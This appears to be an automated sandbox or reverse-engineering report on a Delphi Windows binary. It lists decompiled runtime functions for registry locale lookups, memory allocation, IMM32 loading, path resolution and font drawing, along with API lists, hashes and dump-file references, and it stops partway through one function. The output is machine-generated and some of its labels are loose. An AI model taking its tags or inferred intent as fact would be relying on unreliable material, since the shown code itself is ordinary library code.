Part of subcall function 00405CA0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405D16
Part of subcall function 00405CA0: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,00405DA5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00405D5F
Part of subcall function 00405CA0: RegQueryValueExA.ADVAPI32(?,00405F0C,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,00405DA5,?,80000001), ref: 00405D7D
Part of subcall function 00405CA0: RegCloseKey.ADVAPI32(?,00405DAC,00000000,00000000,00000005,00000000,00405DA5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00405D9F

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Open$FileModuleNameQueryValue$Close
String ID:
API String ID: 2796650324-0
Opcode ID: 3d2362743f924f875b5a350bdc77fee5870a8126f4c59cb65ab49357851bb911
Instruction ID: d33aed5311a0e2fae4487a5322506e26d3b21fe1229f44e33d68ae0e5b1a5d0f
Opcode Fuzzy Hash: 3d2362743f924f875b5a350bdc77fee5870a8126f4c59cb65ab49357851bb911
Instruction Fuzzy Hash: 29E06D71A007208FDB10DEA888C1A4737D8AB08794F000A66FC58EF38AD374DD108BD4

Uniqueness

Uniqueness Score: -1.00%

Function 0040174C, Relevance: 1.3, APIs: 1, Instructions: 54
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040174C(signed int __eax, void** __ecx, intOrPtr __edx) {
				signed int _v20;
				void** _v24;
				void* _t15;
				void** _t16;
				void* _t17;
				signed int _t27;
				intOrPtr* _t29;
				void* _t31;
				intOrPtr* _t32;

				_v24 = __ecx;
				 *_t32 = __edx;
				_t31 = __eax & 0xfffff000;
				_v20 = __eax +  *_t32 + 0x00000fff & 0xfffff000;
				 *_v24 = _t31;
				_t15 = _v20 - _t31;
				_v24[1] = _t15;
				_t29 =  *0x4925e4; // 0x51b474
				while(_t29 != 0x4925e4) {
					_t17 =  *(_t29 + 8);
					_t27 =  *((intOrPtr*)(_t29 + 0xc)) + _t17;
					if(_t31 > _t17) {
						_t17 = _t31;
					}
					if(_t27 > _v20) {
						_t27 = _v20;
					}
					if(_t27 > _t17) {
						_t15 = VirtualAlloc(_t17, _t27 - _t17, 0x1000, 4); // executed
						if(_t15 == 0) {
							_t16 = _v24;
							 *_t16 = 0;
							return _t16;
						}
					}
					_t29 =  *_t29;
				}
				return _t15;
			}

0x00401753
0x00401757
0x0040175e
0x00401773
0x0040177b
0x00401781
0x00401787
0x0040178a
0x004017ce
0x00401792
0x00401798
0x0040179c
0x0040179e
0x0040179e
0x004017a4
0x004017a6
0x004017a6
0x004017ac
0x004017b9
0x004017c0
0x004017c2
0x004017c8
0x00000000
0x004017c8
0x004017c0
0x004017cc
0x004017cc
0x004017dd

APIs

VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 004017B9

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: f47e4311da42950ec54238d204e9b3a12ba0325d675df7de898aa2191d4c4d17
Instruction ID: 1ef196c48c205fabe416c2ab9c313d61ae50e0bb796a1c586f252d0c907e7949
Opcode Fuzzy Hash: f47e4311da42950ec54238d204e9b3a12ba0325d675df7de898aa2191d4c4d17
Instruction Fuzzy Hash: 24118E76A04705AFC3109F29CD80A2BBBE1EFD4760F16C53EE598A73A5D735AC408789

Uniqueness

Uniqueness Score: -1.00%

Function 0041D1FC, Relevance: 1.3, APIs: 1, Instructions: 52
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041D1FC(intOrPtr _a4, intOrPtr _a8) {
				void* _t14;
				void _t15;
				intOrPtr _t25;
				char* _t26;
				void* _t35;

				if( *0x492a20 == 0) {
					_t14 = VirtualAlloc(0, 0x1000, 0x1000, 0x40); // executed
					_t35 = _t14;
					_t15 =  *0x492a1c; // 0x2340000
					 *_t35 = _t15;
					_t1 = _t35 + 4; // 0x4
					E004029BC(0x4764bc, 2, _t1);
					_t2 = _t35 + 5; // 0x5
					 *((intOrPtr*)(_t35 + 6)) = E0041D1F4(_t2, E0041D1D4);
					_t4 = _t35 + 0xa; // 0xa
					_t26 = _t4;
					do {
						 *_t26 = 0xe8;
						_t5 = _t35 + 4; // 0x4
						 *((intOrPtr*)(_t26 + 1)) = E0041D1F4(_t26, _t5);
						 *((intOrPtr*)(_t26 + 5)) =  *0x492a20;
						 *0x492a20 = _t26;
						_t26 = _t26 + 0xd;
					} while (_t26 - _t35 < 0xffc);
					 *0x492a1c = _t35;
				}
				_t25 =  *0x492a20;
				 *0x492a20 =  *((intOrPtr*)(_t25 + 5));
				 *((intOrPtr*)(_t25 + 5)) = _a4;
				 *((intOrPtr*)(_t25 + 9)) = _a8;
				return  *0x492a20;
			}

0x0041d20a
0x0041d21a
0x0041d21f
0x0041d221
0x0041d226
0x0041d228
0x0041d235
0x0041d23f
0x0041d247
0x0041d24a
0x0041d24a
0x0041d24d
0x0041d24d
0x0041d250
0x0041d25a
0x0041d25f
0x0041d262
0x0041d264
0x0041d26b
0x0041d272
0x0041d272
0x0041d27a
0x0041d27f
0x0041d284
0x0041d28a
0x0041d291

APIs

VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 0041D21A

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: fd1ab33e4235b30f186c43104726c2ae7481be6225aaa20dbab57d05e4986641
Instruction ID: 4e78e070f51fdf12da19326942a77fcdf1f829aea583b288c94c8dd1e240b39b
Opcode Fuzzy Hash: fd1ab33e4235b30f186c43104726c2ae7481be6225aaa20dbab57d05e4986641
Instruction Fuzzy Hash: 62115AB56403059FC720DF19C880B82F7E5EF98350F10C53BE9A99B385D3B8E9458BA9

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00440918, Relevance: 49.1, APIs: 15, Strings: 13, Instructions: 95
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00440918() {
				int _v8;
				intOrPtr _t4;
				struct HINSTANCE__* _t11;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t15;
				struct HINSTANCE__* _t17;
				struct HINSTANCE__* _t19;
				struct HINSTANCE__* _t21;
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t25;
				struct HINSTANCE__* _t27;
				struct HINSTANCE__* _t29;
				intOrPtr _t40;
				intOrPtr _t42;
				intOrPtr _t44;

				_t42 = _t44;
				_t4 =  *0x49129c; // 0x4927f0
				if( *((char*)(_t4 + 0xc)) == 0) {
					return _t4;
				} else {
					_v8 = SetErrorMode(0x8000);
					_push(_t42);
					_push(0x440a7e);
					_push( *[fs:eax]);
					 *[fs:eax] = _t44;
					if( *0x492bc0 == 0) {
						 *0x492bc0 = GetProcAddress(GetModuleHandleA("USER32"), "WINNLSEnableIME");
					}
					if( *0x476a2c == 0) {
						 *0x476a2c = LoadLibraryA("IMM32.DLL");
						if( *0x476a2c != 0) {
							_t11 =  *0x476a2c; // 0x0
							 *0x492bc4 = GetProcAddress(_t11, "ImmGetContext");
							_t13 =  *0x476a2c; // 0x0
							 *0x492bc8 = GetProcAddress(_t13, "ImmReleaseContext");
							_t15 =  *0x476a2c; // 0x0
							 *0x492bcc = GetProcAddress(_t15, "ImmGetConversionStatus");
							_t17 =  *0x476a2c; // 0x0
							 *0x492bd0 = GetProcAddress(_t17, "ImmSetConversionStatus");
							_t19 =  *0x476a2c; // 0x0
							 *0x492bd4 = GetProcAddress(_t19, "ImmSetOpenStatus");
							_t21 =  *0x476a2c; // 0x0
							 *0x492bd8 = GetProcAddress(_t21, "ImmSetCompositionWindow");
							_t23 =  *0x476a2c; // 0x0
							 *0x492bdc = GetProcAddress(_t23, "ImmSetCompositionFontA");
							_t25 =  *0x476a2c; // 0x0
							 *0x492be0 = GetProcAddress(_t25, "ImmGetCompositionStringA");
							_t27 =  *0x476a2c; // 0x0
							 *0x492be4 = GetProcAddress(_t27, "ImmIsIME");
							_t29 =  *0x476a2c; // 0x0
							 *0x492be8 = GetProcAddress(_t29, "ImmNotifyIME");
						}
					}
					_pop(_t40);
					 *[fs:eax] = _t40;
					_push(0x440a85);
					return SetErrorMode(_v8);
				}
			}

0x00440919
0x0044091d
0x00440926
0x00440a88
0x0044092c
0x00440936
0x0044093b
0x0044093c
0x00440941
0x00440944
0x0044094e
0x00440967
0x00440967
0x00440973
0x00440983
0x0044098f
0x0044099a
0x004409a5
0x004409af
0x004409ba
0x004409c4
0x004409cf
0x004409d9
0x004409e4
0x004409ee
0x004409f9
0x00440a03
0x00440a0e
0x00440a18
0x00440a23
0x00440a2d
0x00440a38
0x00440a42
0x00440a4d
0x00440a57
0x00440a62
0x00440a62
0x0044098f
0x00440a69
0x00440a6c
0x00440a6f
0x00440a7d
0x00440a7d

APIs

SetErrorMode.KERNEL32(00008000), ref: 00440931
GetModuleHandleA.KERNEL32(USER32,00000000,00440A7E,?,00008000), ref: 00440955
GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 00440962
LoadLibraryA.KERNEL32(IMM32.DLL,00000000,00440A7E,?,00008000), ref: 0044097E
GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 004409A0
GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 004409B5
GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 004409CA
GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 004409DF
GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 004409F4
GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 00440A09
GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 00440A1E
GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 00440A33
GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 00440A48
GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 00440A5D
SetErrorMode.KERNEL32(?,00440A85,00008000), ref: 00440A78

Strings

ImmReleaseContext, xrefs: 004409AA
ImmSetOpenStatus, xrefs: 004409E9
ImmSetCompositionWindow, xrefs: 004409FE
ImmSetConversionStatus, xrefs: 004409D4
USER32, xrefs: 00440950
ImmGetConversionStatus, xrefs: 004409BF
ImmSetCompositionFontA, xrefs: 00440A13
ImmGetCompositionStringA, xrefs: 00440A28
ImmNotifyIME, xrefs: 00440A52
ImmGetContext, xrefs: 00440995
ImmIsIME, xrefs: 00440A3D
IMM32.DLL, xrefs: 00440979
WINNLSEnableIME, xrefs: 0044095C

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$ErrorMode$HandleLibraryLoadModule
String ID: IMM32.DLL$ImmGetCompositionStringA$ImmGetContext$ImmGetConversionStatus$ImmIsIME$ImmNotifyIME$ImmReleaseContext$ImmSetCompositionFontA$ImmSetCompositionWindow$ImmSetConversionStatus$ImmSetOpenStatus$USER32$WINNLSEnableIME
API String ID: 3397921170-3271328588
Opcode ID: 7e5b88a2ce515de4a660b4f5b801804f178233d851fc15e527dcdd22126a6ba4
Instruction ID: 22175355cffe4bfeaf4df66fa745304b851485a7c6d64ee71613be57ccea2247
Opcode Fuzzy Hash: 7e5b88a2ce515de4a660b4f5b801804f178233d851fc15e527dcdd22126a6ba4
Instruction Fuzzy Hash: F831B6B1650B00EFE740EFB5ED16A253BE9E319304B12843BF209B7591C67D98608F5C

Uniqueness

Uniqueness Score: -1.00%

Function 00405AE8, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 136
stringlibraryfileCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00405AE8(char* __eax, intOrPtr __edx) {
				char* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				struct _WIN32_FIND_DATAA _v334;
				char _v595;
				void* _t45;
				char* _t54;
				char* _t64;
				void* _t83;
				intOrPtr* _t84;
				char* _t90;
				struct HINSTANCE__* _t91;
				char* _t93;
				void* _t94;
				char* _t95;
				void* _t96;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = _v8;
				_t91 = GetModuleHandleA("kernel32.dll");
				if(_t91 == 0) {
					L4:
					if( *_v8 != 0x5c) {
						_t93 = _v8 + 2;
						goto L10;
					} else {
						if( *((char*)(_v8 + 1)) == 0x5c) {
							_t95 = E00405AD4(_v8 + 2);
							if( *_t95 != 0) {
								_t14 = _t95 + 1; // 0x1
								_t93 = E00405AD4(_t14);
								if( *_t93 != 0) {
									L10:
									_t83 = _t93 - _v8;
									_push(_t83 + 1);
									_push(_v8);
									_push( &_v595);
									L00401338();
									while( *_t93 != 0) {
										_t90 = E00405AD4(_t93 + 1);
										_t45 = _t90 - _t93;
										if(_t45 + _t83 + 1 <= 0x105) {
											_push(_t45 + 1);
											_push(_t93);
											_push( &(( &_v595)[_t83]));
											L00401338();
											_t94 = FindFirstFileA( &_v595,  &_v334);
											if(_t94 != 0xffffffff) {
												FindClose(_t94);
												_t54 =  &(_v334.cFileName);
												_push(_t54);
												L00401340();
												if(_t54 + _t83 + 1 + 1 <= 0x105) {
													 *((char*)(_t96 + _t83 - 0x24f)) = 0x5c;
													_push(0x105 - _t83 - 1);
													_push( &(_v334.cFileName));
													_push( &(( &(( &_v595)[_t83]))[1]));
													L00401338();
													_t64 =  &(_v334.cFileName);
													_push(_t64);
													L00401340();
													_t83 = _t83 + _t64 + 1;
													_t93 = _t90;
													continue;
												}
											}
										}
										goto L17;
									}
									_push(_v12);
									_push( &_v595);
									_push(_v8);
									L00401338();
								}
							}
						}
					}
				} else {
					_t84 = GetProcAddress(_t91, "GetLongPathNameA");
					if(_t84 == 0) {
						goto L4;
					} else {
						_push(0x105);
						_push( &_v595);
						_push(_v8);
						if( *_t84() == 0) {
							goto L4;
						} else {
							_push(_v12);
							_push( &_v595);
							_push(_v8);
							L00401338();
						}
					}
				}
				L17:
				return _v16;
			}

0x00405af4
0x00405af7
0x00405afd
0x00405b0a
0x00405b0e
0x00405b50
0x00405b56
0x00405b93
0x00000000
0x00405b58
0x00405b5f
0x00405b70
0x00405b75
0x00405b7b
0x00405b83
0x00405b88
0x00405b96
0x00405b98
0x00405b9e
0x00405ba2
0x00405ba9
0x00405baa
0x00405c55
0x00405bbc
0x00405bc0
0x00405bcd
0x00405bd4
0x00405bd5
0x00405bde
0x00405bdf
0x00405bf7
0x00405bfc
0x00405bff
0x00405c04
0x00405c0a
0x00405c0b
0x00405c1b
0x00405c1d
0x00405c2d
0x00405c34
0x00405c3e
0x00405c3f
0x00405c44
0x00405c4a
0x00405c4b
0x00405c51
0x00405c53
0x00000000
0x00405c53
0x00405c1b
0x00405bfc
0x00000000
0x00405bcd
0x00405c61
0x00405c68
0x00405c6c
0x00405c6d
0x00405c6d
0x00405b88
0x00405b75
0x00405b5f
0x00405b10
0x00405b1b
0x00405b1f
0x00000000
0x00405b21
0x00405b21
0x00405b2c
0x00405b30
0x00405b35
0x00000000
0x00405b37
0x00405b3a
0x00405b41
0x00405b45
0x00405b46
0x00405b46
0x00405b35
0x00405b1f
0x00405c72
0x00405c7b

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,00000001,0047608C,?,00405D48,00000000,00405DA5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00405B05
GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 00405B16
lstrcpyn.KERNEL32(?,?,?,?,00000001,0047608C,?,00405D48,00000000,00405DA5,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00405B46
lstrcpyn.KERNEL32(?,?,?,kernel32.dll,?,00000001,0047608C,?,00405D48,00000000,00405DA5,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00405BAA
lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,?,00000001,0047608C,?,00405D48,00000000,00405DA5,?,80000001), ref: 00405BDF
FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0047608C,?,00405D48,00000000,00405DA5), ref: 00405BF2
FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0047608C,?,00405D48,00000000), ref: 00405BFF
lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0047608C,?,00405D48), ref: 00405C0B
lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001), ref: 00405C3F
lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll), ref: 00405C4B
lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 00405C6D

Strings

GetLongPathNameA, xrefs: 00405B10
\, xrefs: 00405C1D
kernel32.dll, xrefs: 00405B00

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
String ID: GetLongPathNameA$\$kernel32.dll
API String ID: 3245196872-1565342463
Opcode ID: a0ca131dc62e861f4fed9098179ba15cf9d3b55e4a629aaab9a90f7636454dfe
Instruction ID: 73109fc7617de6927649651d2e73acf26c869defa74ee943d75a78e36df64a33
Opcode Fuzzy Hash: a0ca131dc62e861f4fed9098179ba15cf9d3b55e4a629aaab9a90f7636454dfe
Instruction Fuzzy Hash: D441837190465CABEB10EAA8CC85EDFB7ECDF05304F1401B6B949F7291D678AE408F58

Uniqueness

Uniqueness Score: -1.00%

Function 00471BA8, Relevance: 18.4, APIs: 7, Strings: 3, Instructions: 909
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E00471BA8(intOrPtr* __eax, void* __ebx, char __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				char _v12;
				char _v13;
				char _v14;
				char _v20;
				intOrPtr _v24;
				char _v28;
				void* _v29;
				char _v30;
				signed char _v36;
				intOrPtr* _v40;
				void* _v56;
				intOrPtr _v92;
				char _v96;
				struct tagLOGFONTA _v156;
				char _v160;
				char _v168;
				intOrPtr _t463;
				signed int _t464;
				intOrPtr _t465;
				signed int _t474;
				signed int _t478;
				intOrPtr _t528;
				intOrPtr _t529;
				intOrPtr _t535;
				intOrPtr _t542;
				intOrPtr _t543;
				signed int _t557;
				intOrPtr _t567;
				intOrPtr _t578;
				intOrPtr _t591;
				signed int _t596;
				signed int _t598;
				signed int _t600;
				signed int _t603;
				signed int _t605;
				signed int _t607;
				intOrPtr _t609;
				intOrPtr _t610;
				signed int _t612;
				signed int _t631;
				signed int _t633;
				signed int _t636;
				signed int _t638;
				signed int _t643;
				signed int _t646;
				signed int _t655;
				signed int _t657;
				signed int _t666;
				signed int _t671;
				intOrPtr _t685;
				signed int _t687;
				intOrPtr _t688;
				intOrPtr _t689;
				signed int _t702;
				intOrPtr _t703;
				signed int _t715;
				signed int _t720;
				signed int _t724;
				intOrPtr _t732;
				void* _t741;
				void* _t744;
				void* _t747;
				void* _t753;
				void* _t759;
				void* _t761;
				intOrPtr _t762;
				intOrPtr* _t766;
				void* _t769;
				signed int _t778;
				signed int _t781;
				signed int _t795;
				signed int _t796;
				signed int _t797;
				void* _t808;
				intOrPtr _t818;
				void* _t824;
				intOrPtr _t833;
				signed int _t854;
				intOrPtr _t855;
				struct HWND__* _t858;
				intOrPtr _t864;
				signed char* _t866;
				intOrPtr _t880;
				intOrPtr _t916;
				intOrPtr _t921;
				intOrPtr _t938;
				intOrPtr _t942;
				intOrPtr _t951;
				intOrPtr _t965;
				void* _t999;
				void* _t1002;
				intOrPtr _t1022;
				signed int _t1025;
				void* _t1026;
				intOrPtr _t1029;
				intOrPtr _t1031;
				signed char* _t1042;
				intOrPtr _t1043;
				signed int _t1045;
				signed int _t1046;
				void* _t1049;
				void* _t1050;
				intOrPtr _t1051;
				void* _t1052;
				void* _t1053;

				_t1020 = __edi;
				_t1049 = _t1050;
				_t1051 = _t1050 + 0xffffff5c;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v160 = 0;
				_v20 = 0;
				_v12 = __edx;
				_v8 = __eax;
				_push(_t1049);
				_push(0x472865);
				_push( *[fs:eax]);
				 *[fs:eax] = _t1051;
				_t1029 =  *((intOrPtr*)(_v12 + 8));
				_t463 =  *((intOrPtr*)(_t1029 + 8));
				_t1052 = _t463 - 0xffffff97;
				if(_t1052 > 0) {
					__eflags = _t463 - 0xffffff9c;
					if(__eflags > 0) {
						_t464 = _t463 - 0xfffffff4;
						__eflags = _t464;
						if(_t464 == 0) {
							_t465 = _v8;
							_t466 =  *(_t465 + 0x210);
							__eflags =  *(_t465 + 0x210);
							if( *(_t465 + 0x210) == 0) {
								goto L150;
							} else {
								_t833 = _t1029;
								_push(_t1049);
								_push(0x472383);
								_push( *[fs:edx]);
								 *[fs:edx] = _t1051;
								E00420334(_t466);
								 *(_v12 + 0xc) = 0;
								_t474 =  *(_t833 + 0xc);
								__eflags = _t474 & 0x00010000;
								if((_t474 & 0x00010000) != 0) {
									__eflags = _t474 & 0x00020000;
									_v30 = (_t474 & 0x00020000) != 0;
									__eflags = _v30;
									if(_v30 == 0) {
										L57:
										E00402EF0( &_v96, 0x28);
										_v92 =  *((intOrPtr*)(_t833 + 0x24));
										__eflags =  *(_t833 + 0xc) & 0x00010002;
										if(( *(_t833 + 0xc) & 0x00010002) != 0) {
											_t578 = _v8;
											_t951 = _v8;
											__eflags =  *((intOrPtr*)(_t578 + 0x298)) +  *((intOrPtr*)(_t951 + 0x29c));
											if( *((intOrPtr*)(_t578 + 0x298)) +  *((intOrPtr*)(_t951 + 0x29c)) != 0) {
												SelectObject( *(_t833 + 0x10),  *(_v8 + 0x29c));
												DeleteObject( *(_v8 + 0x298));
												 *(_v8 + 0x298) = 0;
												__eflags = 0;
												 *(_v8 + 0x29c) = 0;
											}
										}
										_t478 =  *(_t833 + 0xc);
										__eflags = _t478 & 0x00010001;
										if((_t478 & 0x00010001) == 0) {
											__eflags = _t478 & 0x00010002;
											if((_t478 & 0x00010002) == 0) {
												__eflags = _t478 & 0x00010003;
												if((_t478 & 0x00010003) == 0) {
													__eflags = _t478 & 0x00010004;
													if((_t478 & 0x00010004) != 0) {
														__eflags = _v30;
														if(_v30 == 0) {
															E004719F4(_t833,  &_v96, _t1020, _t1029);
															 *((intOrPtr*)( *_v8 + 0x100))(3);
														} else {
															E004719F4(_t833,  &_v96, _t1020, _t1029);
															 *((intOrPtr*)( *_v8 + 0x104))(3,  *((intOrPtr*)(_t833 + 0x28)));
														}
													}
												} else {
													__eflags = _v30;
													if(_v30 == 0) {
														E004719F4(_t833,  &_v96, _t1020, _t1029);
														 *((intOrPtr*)( *_v8 + 0x100))(2);
													} else {
														E004719F4(_t833,  &_v96, _t1020, _t1029);
														 *((intOrPtr*)( *_v8 + 0x104))(2,  *((intOrPtr*)(_t833 + 0x28)));
													}
												}
											} else {
												__eflags = _v30;
												if(_v30 == 0) {
													E004719F4(_t833,  &_v96, _t1020, _t1029);
													 *((intOrPtr*)( *_v8 + 0x100))(1);
												} else {
													E004719F4(_t833,  &_v96, _t1020, _t1029);
													 *((intOrPtr*)( *_v8 + 0x104))(1,  *((intOrPtr*)(_t833 + 0x28)));
												}
											}
											goto L82;
										} else {
											_push(_t1049);
											_push(0x4721bd);
											_push( *[fs:edx]);
											 *[fs:edx] = _t1051;
											E00420784( *((intOrPtr*)(_v8 + 0x210)),  *(_t833 + 0x10));
											E00420600( *((intOrPtr*)(_v8 + 0x210)));
											E0042061C( *((intOrPtr*)(_v8 + 0x210)));
											_t528 =  *((intOrPtr*)(_v8 + 0x210));
											_t938 =  *((intOrPtr*)(_t528 + 0xc));
											 *((intOrPtr*)(_t938 + 0xc)) = _v8;
											 *((intOrPtr*)(_t938 + 8)) = 0x473928;
											_t529 =  *((intOrPtr*)(_t528 + 0x14));
											 *((intOrPtr*)(_t529 + 0xc)) = _v8;
											 *((intOrPtr*)(_t529 + 8)) = 0x473928;
											 *((char*)(_v8 + 0x28a)) = 0;
											__eflags = _v30;
											if(_v30 == 0) {
												E004719F4(_t833,  &_v96, _t1020, _t1029);
												_t880 =  *((intOrPtr*)(_t833 + 0x28));
												_v13 =  *((intOrPtr*)( *_v8 + 0x100))(0);
											} else {
												E004719F4(_t833,  &_v96, _t1020, _t1029);
												_t153 =  &_v12; // 0x473928
												_t155 =  *((intOrPtr*)( *_t153 + 8)) + 0x38; // 0x367501fa
												_t880 =  *_t155;
												_v13 =  *((intOrPtr*)( *_v8 + 0x104))(0,  *((intOrPtr*)(_t833 + 0x28)));
											}
											__eflags = _v13;
											if(_v13 != 0) {
												_t535 = _v8;
												__eflags =  *((char*)(_t535 + 0x28a));
												if( *((char*)(_t535 + 0x28a)) != 0) {
													 *((char*)(_v8 + 0x28a)) = 0;
													_t1031 =  *((intOrPtr*)(_v8 + 0x210));
													_t542 =  *((intOrPtr*)(_t1031 + 0xc));
													 *((intOrPtr*)(_t542 + 8)) = 0;
													 *((intOrPtr*)(_t542 + 0xc)) = 0;
													_t543 =  *((intOrPtr*)(_t1031 + 0x14));
													 *((intOrPtr*)(_t543 + 8)) = 0;
													 *((intOrPtr*)(_t543 + 0xc)) = 0;
													_t181 =  &_v12; // 0x473928
													_t1022 =  *((intOrPtr*)( *_t181 + 8));
													 *((intOrPtr*)(_t1022 + 0x30)) = E0041EF40( *((intOrPtr*)( *((intOrPtr*)(_t1031 + 0xc)) + 0x18)));
													 *((intOrPtr*)(_t1022 + 0x34)) = E0041EF40(E0041FBE4( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x210)) + 0x14))));
													_t557 = GetObjectA(E0041F414( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x210)) + 0xc)), _t833, _t880), 0x3c,  &_v156);
													__eflags = _t557;
													if(_t557 != 0) {
														E00420784( *((intOrPtr*)(_v8 + 0x210)), 0);
														 *(_v8 + 0x298) = CreateFontIndirectA( &_v156);
														 *(_v8 + 0x29c) = SelectObject( *(_t833 + 0x10),  *(_v8 + 0x298));
														_t204 =  &_v12; // 0x473928
														_t567 =  *_t204;
														_t205 = _t567 + 0xc;
														 *_t205 =  *(_t567 + 0xc) | 0x00000002;
														__eflags =  *_t205;
													}
												}
												_pop(_t942);
												 *[fs:eax] = _t942;
												_push(0x4721c4);
												__eflags = 0;
												return E00420784( *((intOrPtr*)(_v8 + 0x210)), 0);
											} else {
												_t166 =  &_v12; // 0x473928
												 *( *_t166 + 0xc) =  *( *_t166 + 0xc) | 0x00000004;
												E00403E54();
												E00403E54();
												goto L150;
											}
										}
									} else {
										_t591 =  *((intOrPtr*)(_v12 + 8));
										__eflags =  *(_t591 + 0x38);
